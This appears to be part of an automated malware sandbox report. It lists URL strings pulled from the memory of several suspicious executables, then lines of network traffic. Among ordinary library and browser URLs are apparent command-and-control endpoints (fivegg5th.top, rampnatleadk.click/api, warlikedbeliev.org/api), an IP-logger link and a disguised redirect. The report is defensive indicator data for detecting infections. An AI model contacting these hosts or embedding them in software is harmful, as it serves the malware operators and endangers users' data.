Source: 382cd038a3.exe, 00000010.00000002.2354477468.0000000001AC5000.00000004.00000020.00020000.00000000.sdmp, 382cd038a3.exe, 00000010.00000003.2313394480.0000000001AC2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://home.fivegg5th.top/ZhnSMEmOyBahvsfTCosA1738232489?argument=0
Source: 382cd038a3.exe, 00000010.00000002.2354477468.0000000001AC5000.00000004.00000020.00020000.00000000.sdmp, 382cd038a3.exe, 00000010.00000003.2313394480.0000000001AC2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://home.fivegg5th.top/ZhnSMEmOyBahvsfTCosA1738232489?argument=0p
Source: 382cd038a3.exe, 00000010.00000002.2349258270.0000000000DA5000.00000040.00000001.01000000.00000010.sdmp	String found in binary or memory: http://home.fivegg5th.top/ZhnSMEmOyBahvsfTCosA1738232489http://home.fivegg5th.top/ZhnSMEmOyBahvsfTCo
Source: 382cd038a3.exe, 00000010.00000003.2315693674.0000000001AB7000.00000004.00000020.00020000.00000000.sdmp, 382cd038a3.exe, 00000010.00000002.2354206691.0000000001AB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://home.fivegg5th.top/ZhnSMEmOyBahvsfTCosA1738232489lse
Source: 382cd038a3.exe, 00000010.00000003.2214419534.0000000007614000.00000004.00001000.00020000.00000000.sdmp, 382cd038a3.exe, 00000010.00000002.2349258270.0000000000DA5000.00000040.00000001.01000000.00000010.sdmp	String found in binary or memory: http://html4/loose.dtd
Source: eb74aeb58b.exe, 00000017.00000003.2355929521.0000000005403000.00000004.00000800.00020000.00000000.sdmp, 1f1ada1ce1.exe, 00000018.00000003.2375088376.00000000057AF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: eb74aeb58b.exe, 00000017.00000003.2355929521.0000000005403000.00000004.00000800.00020000.00000000.sdmp, 1f1ada1ce1.exe, 00000018.00000003.2375088376.00000000057AF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: 3f28c42ac4.exe, 0000000D.00000003.2555844540.0000000005910000.00000004.00000020.00020000.00000000.sdmp, 3f28c42ac4.exe, 0000000D.00000003.2554734682.000000000594B000.00000004.00000020.00020000.00000000.sdmp, 3f28c42ac4.exe, 0000000D.00000003.2554948831.0000000005990000.00000004.00000020.00020000.00000000.sdmp, 3f28c42ac4.exe, 0000000D.00000003.2554289238.0000000005910000.00000004.00000020.00020000.00000000.sdmp, 3f28c42ac4.exe, 0000000D.00000003.2553503292.000000000566F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.ccleaner.comqhttps://take.rdrct-now.online/go/ZWKA?p78705p298845p1174
Source: 0f39a8c7db.exe, 0f39a8c7db.exe, 00000008.00000002.2524620028.000000006C4BD000.00000002.00000001.01000000.00000015.sdmp	String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: 0f39a8c7db.exe, 00000008.00000002.2489551392.0000000005AA8000.00000004.00000020.00020000.00000000.sdmp, 0f39a8c7db.exe, 00000008.00000002.2522827277.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: eb74aeb58b.exe, 00000017.00000003.2355929521.0000000005403000.00000004.00000800.00020000.00000000.sdmp, 1f1ada1ce1.exe, 00000018.00000003.2375088376.00000000057AF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: eb74aeb58b.exe, 00000017.00000003.2355929521.0000000005403000.00000004.00000800.00020000.00000000.sdmp, 1f1ada1ce1.exe, 00000018.00000003.2375088376.00000000057AF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: eb74aeb58b.exe, 00000017.00000003.2317769850.0000000005389000.00000004.00000800.00020000.00000000.sdmp, eb74aeb58b.exe, 00000017.00000003.2316872643.0000000005389000.00000004.00000800.00020000.00000000.sdmp, eb74aeb58b.exe, 00000017.00000003.2316537294.000000000538C000.00000004.00000800.00020000.00000000.sdmp, 1f1ada1ce1.exe, 00000018.00000003.2334143154.000000000572B000.00000004.00000800.00020000.00000000.sdmp, 1f1ada1ce1.exe, 00000018.00000003.2333964717.000000000572E000.00000004.00000800.00020000.00000000.sdmp, 1f1ada1ce1.exe, 00000018.00000003.2334400162.000000000572B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: 0f39a8c7db.exe, 00000008.00000002.2499260667.000000000BBF2000.00000004.00000020.00020000.00000000.sdmp, eb74aeb58b.exe, 00000017.00000003.2359500563.00000000053DA000.00000004.00000800.00020000.00000000.sdmp, 1f1ada1ce1.exe, 00000018.00000003.2378315419.0000000005789000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696491991400800003.2&ci=1696491991993.
Source: 0f39a8c7db.exe, 00000008.00000002.2499260667.000000000BBF2000.00000004.00000020.00020000.00000000.sdmp, 1f1ada1ce1.exe, 00000018.00000003.2378315419.0000000005789000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696491991400800003.1&ci=1696491991993.12791&cta
Source: eb74aeb58b.exe, 00000017.00000003.2317769850.0000000005389000.00000004.00000800.00020000.00000000.sdmp, eb74aeb58b.exe, 00000017.00000003.2316872643.0000000005389000.00000004.00000800.00020000.00000000.sdmp, eb74aeb58b.exe, 00000017.00000003.2316537294.000000000538C000.00000004.00000800.00020000.00000000.sdmp, 1f1ada1ce1.exe, 00000018.00000003.2334143154.000000000572B000.00000004.00000800.00020000.00000000.sdmp, 1f1ada1ce1.exe, 00000018.00000003.2333964717.000000000572E000.00000004.00000800.00020000.00000000.sdmp, 1f1ada1ce1.exe, 00000018.00000003.2334400162.000000000572B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: 0f39a8c7db.exe, 00000008.00000002.2448228643.0000000000FE0000.00000004.00000020.00020000.00000000.sdmp, eb74aeb58b.exe, 00000017.00000003.2317769850.0000000005389000.00000004.00000800.00020000.00000000.sdmp, eb74aeb58b.exe, 00000017.00000003.2316872643.0000000005389000.00000004.00000800.00020000.00000000.sdmp, eb74aeb58b.exe, 00000017.00000003.2316537294.000000000538C000.00000004.00000800.00020000.00000000.sdmp, 1f1ada1ce1.exe, 00000018.00000003.2334143154.000000000572B000.00000004.00000800.00020000.00000000.sdmp, 1f1ada1ce1.exe, 00000018.00000003.2333964717.000000000572E000.00000004.00000800.00020000.00000000.sdmp, 1f1ada1ce1.exe, 00000018.00000003.2334400162.000000000572B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: 0f39a8c7db.exe, 00000008.00000002.2448228643.0000000000FE0000.00000004.00000020.00020000.00000000.sdmp, eb74aeb58b.exe, 00000017.00000003.2317769850.0000000005389000.00000004.00000800.00020000.00000000.sdmp, eb74aeb58b.exe, 00000017.00000003.2316872643.0000000005389000.00000004.00000800.00020000.00000000.sdmp, eb74aeb58b.exe, 00000017.00000003.2316537294.000000000538C000.00000004.00000800.00020000.00000000.sdmp, 1f1ada1ce1.exe, 00000018.00000003.2334143154.000000000572B000.00000004.00000800.00020000.00000000.sdmp, 1f1ada1ce1.exe, 00000018.00000003.2333964717.000000000572E000.00000004.00000800.00020000.00000000.sdmp, 1f1ada1ce1.exe, 00000018.00000003.2334400162.000000000572B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: 0f39a8c7db.exe, 00000008.00000002.2499260667.000000000BBF2000.00000004.00000020.00020000.00000000.sdmp, eb74aeb58b.exe, 00000017.00000003.2359500563.00000000053DA000.00000004.00000800.00020000.00000000.sdmp, 1f1ada1ce1.exe, 00000018.00000003.2378315419.0000000005789000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
Source: 0f39a8c7db.exe, 00000008.00000002.2499260667.000000000BBF2000.00000004.00000020.00020000.00000000.sdmp, eb74aeb58b.exe, 00000017.00000003.2359500563.00000000053DA000.00000004.00000800.00020000.00000000.sdmp, 1f1ada1ce1.exe, 00000018.00000003.2378315419.0000000005789000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: 382cd038a3.exe, 00000010.00000002.2349258270.0000000000DA5000.00000040.00000001.01000000.00000010.sdmp	String found in binary or memory: https://curl.se/docs/alt-svc.html
Source: 382cd038a3.exe, 00000010.00000002.2349258270.0000000000DA5000.00000040.00000001.01000000.00000010.sdmp	String found in binary or memory: https://curl.se/docs/hsts.html
Source: 382cd038a3.exe, 00000010.00000003.2214419534.0000000007614000.00000004.00001000.00020000.00000000.sdmp, 382cd038a3.exe, 00000010.00000002.2349258270.0000000000DA5000.00000040.00000001.01000000.00000010.sdmp	String found in binary or memory: https://curl.se/docs/http-cookies.html
Source: 0f39a8c7db.exe, 00000008.00000002.2448228643.0000000000FE0000.00000004.00000020.00020000.00000000.sdmp, eb74aeb58b.exe, 00000017.00000003.2317769850.0000000005389000.00000004.00000800.00020000.00000000.sdmp, eb74aeb58b.exe, 00000017.00000003.2316872643.0000000005389000.00000004.00000800.00020000.00000000.sdmp, eb74aeb58b.exe, 00000017.00000003.2316537294.000000000538C000.00000004.00000800.00020000.00000000.sdmp, 1f1ada1ce1.exe, 00000018.00000003.2334143154.000000000572B000.00000004.00000800.00020000.00000000.sdmp, 1f1ada1ce1.exe, 00000018.00000003.2333964717.000000000572E000.00000004.00000800.00020000.00000000.sdmp, 1f1ada1ce1.exe, 00000018.00000003.2334400162.000000000572B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: eb74aeb58b.exe, 00000017.00000003.2317769850.0000000005389000.00000004.00000800.00020000.00000000.sdmp, eb74aeb58b.exe, 00000017.00000003.2316872643.0000000005389000.00000004.00000800.00020000.00000000.sdmp, eb74aeb58b.exe, 00000017.00000003.2316537294.000000000538C000.00000004.00000800.00020000.00000000.sdmp, 1f1ada1ce1.exe, 00000018.00000003.2334143154.000000000572B000.00000004.00000800.00020000.00000000.sdmp, 1f1ada1ce1.exe, 00000018.00000003.2333964717.000000000572E000.00000004.00000800.00020000.00000000.sdmp, 1f1ada1ce1.exe, 00000018.00000003.2334400162.000000000572B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: 0f39a8c7db.exe, 00000008.00000002.2448228643.0000000000FE0000.00000004.00000020.00020000.00000000.sdmp, eb74aeb58b.exe, 00000017.00000003.2317769850.0000000005389000.00000004.00000800.00020000.00000000.sdmp, eb74aeb58b.exe, 00000017.00000003.2316872643.0000000005389000.00000004.00000800.00020000.00000000.sdmp, eb74aeb58b.exe, 00000017.00000003.2316537294.000000000538C000.00000004.00000800.00020000.00000000.sdmp, 1f1ada1ce1.exe, 00000018.00000003.2334143154.000000000572B000.00000004.00000800.00020000.00000000.sdmp, 1f1ada1ce1.exe, 00000018.00000003.2333964717.000000000572E000.00000004.00000800.00020000.00000000.sdmp, 1f1ada1ce1.exe, 00000018.00000003.2334400162.000000000572B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: 3f28c42ac4.exe, 0000000D.00000003.2555844540.0000000005910000.00000004.00000020.00020000.00000000.sdmp, 3f28c42ac4.exe, 0000000D.00000003.2554734682.000000000594B000.00000004.00000020.00020000.00000000.sdmp, 3f28c42ac4.exe, 0000000D.00000003.2554948831.0000000005990000.00000004.00000020.00020000.00000000.sdmp, 3f28c42ac4.exe, 0000000D.00000003.2554289238.0000000005910000.00000004.00000020.00020000.00000000.sdmp, 3f28c42ac4.exe, 0000000D.00000003.2553503292.000000000566F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://g-cleanit.hk
Source: 382cd038a3.exe, 00000010.00000003.2214419534.0000000007614000.00000004.00001000.00020000.00000000.sdmp, 382cd038a3.exe, 00000010.00000002.2349258270.0000000000DA5000.00000040.00000001.01000000.00000010.sdmp	String found in binary or memory: https://httpbin.org/ip
Source: 382cd038a3.exe, 00000010.00000003.2214419534.0000000007614000.00000004.00001000.00020000.00000000.sdmp, 382cd038a3.exe, 00000010.00000002.2349258270.0000000000DA5000.00000040.00000001.01000000.00000010.sdmp	String found in binary or memory: https://httpbin.org/ipbefore
Source: 1f1ada1ce1.exe, 00000018.00000003.2378315419.0000000005789000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqX1CqX4pbW1pbWfpbZ7ReNxR3UIG8zInwYIFIVs9eYi
Source: 3f28c42ac4.exe, 0000000D.00000003.2555844540.0000000005910000.00000004.00000020.00020000.00000000.sdmp, 3f28c42ac4.exe, 0000000D.00000003.2554734682.000000000594B000.00000004.00000020.00020000.00000000.sdmp, 3f28c42ac4.exe, 0000000D.00000003.2554948831.0000000005990000.00000004.00000020.00020000.00000000.sdmp, 3f28c42ac4.exe, 0000000D.00000003.2554289238.0000000005910000.00000004.00000020.00020000.00000000.sdmp, 3f28c42ac4.exe, 0000000D.00000003.2553503292.000000000566F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://iplogger.org/1Pz8p7
Source: eb74aeb58b.exe, 00000017.00000003.2378340546.00000000053CC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://rampnatleadk.cli
Source: eb74aeb58b.exe, 00000017.00000003.2411005225.0000000000C17000.00000004.00000020.00020000.00000000.sdmp, eb74aeb58b.exe, 00000017.00000003.2334533925.00000000053CC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://rampnatleadk.click/
Source: eb74aeb58b.exe, 00000017.00000003.2432243267.0000000000C25000.00000004.00000020.00020000.00000000.sdmp, eb74aeb58b.exe, 00000017.00000003.2445826184.0000000000BBC000.00000004.00000020.00020000.00000000.sdmp, eb74aeb58b.exe, 00000017.00000003.2355104837.00000000053CC000.00000004.00000800.00020000.00000000.sdmp, eb74aeb58b.exe, 00000017.00000002.2496161679.00000000053D5000.00000004.00000800.00020000.00000000.sdmp, eb74aeb58b.exe, 00000017.00000003.2355478101.00000000053CC000.00000004.00000800.00020000.00000000.sdmp, eb74aeb58b.exe, 00000017.00000002.2464214195.0000000000BBC000.00000004.00000020.00020000.00000000.sdmp, eb74aeb58b.exe, 00000017.00000003.2411047858.0000000000C25000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://rampnatleadk.click/api
Source: eb74aeb58b.exe, 00000017.00000003.2355104837.00000000053CC000.00000004.00000800.00020000.00000000.sdmp, eb74aeb58b.exe, 00000017.00000003.2355478101.00000000053CC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://rampnatleadk.click/api&Z
Source: eb74aeb58b.exe, 00000017.00000002.2466916730.0000000000C26000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://rampnatleadk.click/api11
Source: eb74aeb58b.exe, 00000017.00000003.2445826184.0000000000BBC000.00000004.00000020.00020000.00000000.sdmp, eb74aeb58b.exe, 00000017.00000002.2464214195.0000000000BBC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://rampnatleadk.click/apik
Source: eb74aeb58b.exe, 00000017.00000003.2448712392.0000000000C1B000.00000004.00000020.00020000.00000000.sdmp, eb74aeb58b.exe, 00000017.00000003.2432243267.0000000000C1B000.00000004.00000020.00020000.00000000.sdmp, eb74aeb58b.exe, 00000017.00000002.2466544167.0000000000C1B000.00000004.00000020.00020000.00000000.sdmp, eb74aeb58b.exe, 00000017.00000003.2411005225.0000000000C17000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://rampnatleadk.click/e
Source: eb74aeb58b.exe, 00000017.00000003.2332576344.00000000053C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://rampnatleadk.click/i
Source: eb74aeb58b.exe, 00000017.00000003.2448712392.0000000000C1B000.00000004.00000020.00020000.00000000.sdmp, eb74aeb58b.exe, 00000017.00000003.2392588933.0000000000C1B000.00000004.00000020.00020000.00000000.sdmp, eb74aeb58b.exe, 00000017.00000003.2432243267.0000000000C1B000.00000004.00000020.00020000.00000000.sdmp, eb74aeb58b.exe, 00000017.00000002.2466544167.0000000000C1B000.00000004.00000020.00020000.00000000.sdmp, eb74aeb58b.exe, 00000017.00000003.2411005225.0000000000C17000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://rampnatleadk.click/u
Source: 1f1ada1ce1.exe, 00000018.00000003.2377535145.0000000005A13000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: 1f1ada1ce1.exe, 00000018.00000003.2377535145.0000000005A13000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: 0f39a8c7db.exe, 00000008.00000003.2398934943.000000000BE6A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.elMx_wJzrE6l
Source: 1f1ada1ce1.exe, 00000018.00000003.2617506348.0000000001096000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://warlikedbeliev.org/
Source: 1f1ada1ce1.exe, 00000018.00000003.2617506348.0000000001096000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://warlikedbeliev.org/?
Source: 1f1ada1ce1.exe, 00000018.00000003.2392742627.00000000010E8000.00000004.00000020.00020000.00000000.sdmp, 1f1ada1ce1.exe, 00000018.00000003.2404305353.00000000010E8000.00000004.00000020.00020000.00000000.sdmp, 1f1ada1ce1.exe, 00000018.00000003.2400915904.00000000010E8000.00000004.00000020.00020000.00000000.sdmp, 1f1ada1ce1.exe, 00000018.00000003.2401814629.00000000010E8000.00000004.00000020.00020000.00000000.sdmp, 1f1ada1ce1.exe, 00000018.00000003.2374517009.00000000010E9000.00000004.00000020.00020000.00000000.sdmp, 1f1ada1ce1.exe, 00000018.00000003.2614521005.00000000010F3000.00000004.00000020.00020000.00000000.sdmp, 1f1ada1ce1.exe, 00000018.00000003.2403345264.00000000010E8000.00000004.00000020.00020000.00000000.sdmp, 1f1ada1ce1.exe, 00000018.00000003.2376854459.00000000010E9000.00000004.00000020.00020000.00000000.sdmp, 1f1ada1ce1.exe, 00000018.00000003.2617506348.0000000001096000.00000004.00000020.00020000.00000000.sdmp, 1f1ada1ce1.exe, 00000018.00000003.2393277483.00000000010E8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://warlikedbeliev.org/api
Source: 1f1ada1ce1.exe, 00000018.00000003.2477133570.00000000010F5000.00000004.00000020.00020000.00000000.sdmp, 1f1ada1ce1.exe, 00000018.00000003.2498722935.00000000010FD000.00000004.00000020.00020000.00000000.sdmp, 1f1ada1ce1.exe, 00000018.00000003.2466720363.00000000010FD000.00000004.00000020.00020000.00000000.sdmp, 1f1ada1ce1.exe, 00000018.00000003.2437725349.00000000010F9000.00000004.00000020.00020000.00000000.sdmp, 1f1ada1ce1.exe, 00000018.00000003.2614521005.00000000010F3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://warlikedbeliev.org/api/
Source: 1f1ada1ce1.exe, 00000018.00000003.2614521005.00000000010F3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://warlikedbeliev.org/api2
Source: 1f1ada1ce1.exe, 00000018.00000003.2614521005.00000000010F3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://warlikedbeliev.org/api7
Source: 1f1ada1ce1.exe, 00000018.00000003.2392742627.00000000010E8000.00000004.00000020.00020000.00000000.sdmp, 1f1ada1ce1.exe, 00000018.00000003.2404305353.00000000010E8000.00000004.00000020.00020000.00000000.sdmp, 1f1ada1ce1.exe, 00000018.00000003.2404646972.00000000010E8000.00000004.00000020.00020000.00000000.sdmp, 1f1ada1ce1.exe, 00000018.00000003.2405444703.00000000010E8000.00000004.00000020.00020000.00000000.sdmp, 1f1ada1ce1.exe, 00000018.00000003.2400915904.00000000010E8000.00000004.00000020.00020000.00000000.sdmp, 1f1ada1ce1.exe, 00000018.00000003.2406789937.00000000010E8000.00000004.00000020.00020000.00000000.sdmp, 1f1ada1ce1.exe, 00000018.00000003.2406220397.00000000010E8000.00000004.00000020.00020000.00000000.sdmp, 1f1ada1ce1.exe, 00000018.00000003.2401814629.00000000010E8000.00000004.00000020.00020000.00000000.sdmp, 1f1ada1ce1.exe, 00000018.00000003.2403345264.00000000010E8000.00000004.00000020.00020000.00000000.sdmp, 1f1ada1ce1.exe, 00000018.00000003.2407121284.00000000010E8000.00000004.00000020.00020000.00000000.sdmp, 1f1ada1ce1.exe, 00000018.00000003.2393277483.00000000010E8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://warlikedbeliev.org/apib
Source: 1f1ada1ce1.exe, 00000018.00000003.2392742627.00000000010E8000.00000004.00000020.00020000.00000000.sdmp, 1f1ada1ce1.exe, 00000018.00000003.2374517009.00000000010E9000.00000004.00000020.00020000.00000000.sdmp, 1f1ada1ce1.exe, 00000018.00000003.2376854459.00000000010E9000.00000004.00000020.00020000.00000000.sdmp, 1f1ada1ce1.exe, 00000018.00000003.2393277483.00000000010E8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://warlikedbeliev.org/apig
Source: 1f1ada1ce1.exe, 00000018.00000003.2617506348.0000000001096000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://warlikedbeliev.org/apiping
Source: 1f1ada1ce1.exe, 00000018.00000003.2477133570.00000000010F5000.00000004.00000020.00020000.00000000.sdmp, 1f1ada1ce1.exe, 00000018.00000003.2498722935.00000000010FD000.00000004.00000020.00020000.00000000.sdmp, 1f1ada1ce1.exe, 00000018.00000003.2614521005.00000000010F3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://warlikedbeliev.org/apis
Source: 1f1ada1ce1.exe, 00000018.00000003.2617506348.0000000001063000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://warlikedbeliev.org:443/api
Source: 1f1ada1ce1.exe, 00000018.00000003.2617506348.0000000001063000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://warlikedbeliev.org:443/apiicrosoft
Source: eb74aeb58b.exe, 00000017.00000003.2378340546.00000000053D5000.00000004.00000800.00020000.00000000.sdmp, eb74aeb58b.exe, 00000017.00000003.2372187324.00000000053D5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&rB
Source: 0f39a8c7db.exe, 00000008.00000002.2499260667.000000000BBF2000.00000004.00000020.00020000.00000000.sdmp, 1f1ada1ce1.exe, 00000018.00000003.2378315419.0000000005789000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_15d7e4b694824b33323940336fbf0bead57d89764383fe44
Source: eb74aeb58b.exe, 00000017.00000003.2317769850.0000000005389000.00000004.00000800.00020000.00000000.sdmp, eb74aeb58b.exe, 00000017.00000003.2316872643.0000000005389000.00000004.00000800.00020000.00000000.sdmp, eb74aeb58b.exe, 00000017.00000003.2316537294.000000000538C000.00000004.00000800.00020000.00000000.sdmp, 1f1ada1ce1.exe, 00000018.00000003.2334143154.000000000572B000.00000004.00000800.00020000.00000000.sdmp, 1f1ada1ce1.exe, 00000018.00000003.2333964717.000000000572E000.00000004.00000800.00020000.00000000.sdmp, 1f1ada1ce1.exe, 00000018.00000003.2334400162.000000000572B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: eb74aeb58b.exe, 00000017.00000003.2317769850.0000000005389000.00000004.00000800.00020000.00000000.sdmp, eb74aeb58b.exe, 00000017.00000003.2316872643.0000000005389000.00000004.00000800.00020000.00000000.sdmp, eb74aeb58b.exe, 00000017.00000003.2316537294.000000000538C000.00000004.00000800.00020000.00000000.sdmp, 1f1ada1ce1.exe, 00000018.00000003.2334143154.000000000572B000.00000004.00000800.00020000.00000000.sdmp, 1f1ada1ce1.exe, 00000018.00000003.2333964717.000000000572E000.00000004.00000800.00020000.00000000.sdmp, 1f1ada1ce1.exe, 00000018.00000003.2334400162.000000000572B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: 0f39a8c7db.exe, 00000008.00000002.2499260667.000000000BBF2000.00000004.00000020.00020000.00000000.sdmp, eb74aeb58b.exe, 00000017.00000003.2359500563.00000000053DA000.00000004.00000800.00020000.00000000.sdmp, 1f1ada1ce1.exe, 00000018.00000003.2378315419.0000000005789000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u
Source: eb74aeb58b.exe, 00000017.00000003.2358108421.000000000545A000.00000004.00000800.00020000.00000000.sdmp, 1f1ada1ce1.exe, 00000018.00000003.2376438923.00000000057FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org
Source: 0f39a8c7db.exe, 00000008.00000002.2431848373.00000000001AC000.00000040.00000001.01000000.00000009.sdmp	String found in binary or memory: https://www.mozilla.org/about/
Source: 1f1ada1ce1.exe, 00000018.00000003.2377535145.0000000005A13000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.0JoCxlq8ibGr
Source: 0f39a8c7db.exe, 00000008.00000002.2431848373.00000000001AC000.00000040.00000001.01000000.00000009.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/
Source: 1f1ada1ce1.exe, 00000018.00000003.2377535145.0000000005A13000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.Tgc_vjLFc3HK
Source: 1f1ada1ce1.exe, 00000018.00000003.2377535145.0000000005A13000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: 0f39a8c7db.exe, 00000008.00000002.2431848373.00000000001AC000.00000040.00000001.01000000.00000009.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: 0f39a8c7db.exe, 00000008.00000003.2398934943.000000000BE6A000.00000004.00000020.00020000.00000000.sdmp, eb74aeb58b.exe, 00000017.00000003.2358524206.0000000005671000.00000004.00000800.00020000.00000000.sdmp, 1f1ada1ce1.exe, 00000018.00000003.2377535145.0000000005A13000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: a103019032.exe, 0000001B.00000002.2578399399.000000000196E000.00000004.00000020.00020000.00000000.sdmp, a103019032.exe, 0000001B.00000002.2567299552.0000000001772000.00000004.00000020.00020000.00000000.sdmp, a103019032.exe, 0000001B.00000003.2511383869.0000000001617000.00000004.00000020.00020000.00000000.sdmp, a103019032.exe, 0000001B.00000003.2551480909.0000000001771000.00000004.00000020.00020000.00000000.sdmp, a103019032.exe, 0000001B.00000003.2550591050.0000000001757000.00000004.00000020.00020000.00000000.sdmp, a103019032.exe, 0000001B.00000003.2552725140.0000000001772000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49865
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49986
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49864
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49985
Source: unknown	Network traffic detected: HTTP traffic on port 49949 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49932 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49961 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49795 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49990 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49859
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49979
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49857
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49978
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49856
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49977
Source: unknown	Network traffic detected: HTTP traffic on port 49772 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49976
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49854
Source: unknown	Network traffic detected: HTTP traffic on port 49841 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49974
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 49950 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49973
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49972
Source: unknown	Network traffic detected: HTTP traffic on port 49893 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
